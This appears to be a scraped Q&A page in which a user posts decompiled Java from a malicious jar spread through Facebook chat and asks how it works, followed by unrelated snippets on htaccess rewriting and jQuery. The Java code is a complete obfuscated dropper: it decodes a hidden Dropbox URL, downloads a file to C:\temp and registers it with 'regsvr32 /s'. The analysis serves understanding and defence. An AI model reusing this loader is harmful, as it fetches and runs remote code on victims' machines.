java - Code inside this undetectable malware -


i have got message 2 times in facebook quoting " lol abc.rar" , abc.rar file has executable jar file once clicked tries connect facebook , enters same message chat randomly. decompiled using jd gui 0.36 , found class czjffdqozxffyhrq inside malware/virus,there manifest file inside it.i tried virus total gives no results. surely threat has come me 2 facebook friends of mine, unrelated each other ,so it's spreading fast virus total result: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/

now code of class:-package com.cakes;

import java.io.file; import java.io.fileoutputstream; import java.io.ioexception; import java.io.inputstream; import java.io.outputstream; import java.net.url;  public class czjffdqozxffyhrq {   public static string mrdbdgwortilmglt()   {     int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };      stringbuilder cfmbxqxdanzahnu = new stringbuilder(tdclrmdqriktvlkvmy.length);     (int = 0; < tdclrmdqriktvlkvmy.length; i++) {       cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);     }     return cfmbxqxdanzahnu.tostring();   }    public static string olzezeaokmr()   {     int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };      stringbuilder uurwhymtb = new stringbuilder(wwlytwss.length);     (int = 0; < wwlytwss.length; i++) {       uurwhymtb.append((char)wwlytwss[i]);     }     return uurwhymtb.tostring();   }    public static string wxujpwlzjfvvc()   {     int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };      stringbuilder dmpxcpok = new stringbuilder(krihniioygdowfq.length);     (int = 0; < krihniioygdowfq.length; i++) {       dmpxcpok.append((char)krihniioygdowfq[i]);     }     return dmpxcpok.tostring();   }    public static string uwqeeyesndtlyfye()   {     int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };      stringbuilder eiljiba = new stringbuilder(wwlytwsspath.length);     (int = 0; < wwlytwsspath.length; i++) {       eiljiba.append((char)wwlytwsspath[i]);     }     return eiljiba.tostring();   }    public static void bnyikewbdrqhetgb()     throws ioexception   {     int m = 1;     while (m < 7)     {       runtime.getruntime().exec(uwqeeyesndtlyfye());       m++;     }   }    public static void main(string[] args)     throws exception   {     new file(wxujpwlzjfvvc()).mkdir();     file u = new file(olzezeaokmr());     if (u.exists())     {       bnyikewbdrqhetgb();     }     else     {       string pdisodea = mrdbdgwortilmglt();       string lwpztudm = olzezeaokmr();       lslmzhpvu(pdisodea, lwpztudm);     }   }    public static void lslmzhpvu(string rklnt, string nenyy)     throws ioexception   {     url hsnmxltpgt = new url(rklnt);     inputstream mlzfltpyqeoqdahzvel = hsnmxltpgt.openstream();     outputstream uxvkcl = new fileoutputstream(nenyy);     byte[] b = new byte[432101];     int length;     while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)     {       int length;       uxvkcl.write(b, 0, length);     }     mlzfltpyqeoqdahzvel.close();     uxvkcl.close();     bnyikewbdrqhetgb();   } }

can please explain how working , why still not detectable?

basically downloads file from;

http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1

(obfuscated link, don't want downloading mistake)

...to c:\temp , registers in system using;

regsvr32 /s <filename>

the real evil in downloaded file (which i'm not going download :) )


Comments

Post a Comment

Popular posts from this blog

apache - Remove .php and add trailing slash in url using htaccess not loading css -

i have add following code htaccess file removing .php extension , add trailing slash urls. worked fine reduced page loading speed , css code not loading @ all. pages ugly. please help rewriteengine on rewritebase / ## hide .php extension snippet # externally redirect /dir/foo.php /dir/foo rewritecond %{the_request} ^[a-z]{3,}\s([^.]+)\.php [nc] rewriterule ^ %1/ [r,l] # add trailing slash rewritecond %{request_filename} !-f rewritecond %{request_uri} !/$ rewriterule . %{request_uri}/ [l,r=301] # internally forward /dir/foo /dir/foo.php rewritecond %{request_filename} !-d rewritecond %{request_filename}.php -f rewriterule ^(.*?)/?$ $1.php [l] we can rewrite urls using .htaccess files. before writing in .htaccess files need verify kind of server using. can check server adding a <?php phpinfo(); ?> in php page. ensure mod_rewrite module enabled in apache server. can identified checking phpinfo included page. common methods used url rewriting follows ...
Read more

javascript - jQuery show full size image on click -

pretty self explanatory not workking . i want display full image when user click on image... yes know there tons of plugins but i want keep simple. any idea ? css : .full { display: none; width: 500px; height: 500px; margin-left: 100px; margin-top: -300px; position: fixed; background-color: #f00; z-index: 6; } .thumbnail { width: 50px; height: 50px; } html: <img class="thumbnail" src="http://4.bp.blogspot.com/-uhbdp2esxng/txneptvi92i/aaaaaaaaaky/upfqis7zto0/s1600/rihanna-wallpaper.jpg"> jquery: $(document).ready(function() { $('.thumbnail').on('click', function() { var img = $('<img />',{src:this.src,'class':'full'}); $('.full').html(img).show(); console.log('done!'); }); }); try looking how jquery works. $(document).ready(function() { $('.thumbnail').on('click', function(...
Read more